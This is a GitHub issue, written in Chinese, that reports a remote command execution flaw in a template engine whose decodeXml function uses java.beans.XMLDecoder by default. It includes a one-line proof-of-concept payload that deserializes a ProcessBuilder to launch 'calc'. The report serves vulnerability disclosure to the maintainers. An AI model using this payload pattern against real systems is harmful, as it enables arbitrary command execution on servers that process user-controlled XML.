New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

decodeXml 默认java.beans.XMLEncoder函数存在安全问题 #224

Open
xqc2000 opened this Issue Nov 19, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@xqc2000

xqc2000 commented Nov 19, 2018

模板得decodeXml函数存在安全问题,不配置xml.codec时默认使用得是java.beans.XMLEncoder。当在模板中调用decodeXml函数对XML数据进行处理时,当被处理得数据用户可控时就存在远程命令执行问题。
POC:
#set(xml2='<?xml version="1.0" encoding="UTF-8"?><java version="" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>') ${xml2.decodeXml()}

@xqc2000 xqc2000 changed the title from decodeXml 函数存在安全问题 to decodeXml 默认java.beans.XMLEncoder函数存在安全问题 Nov 19, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment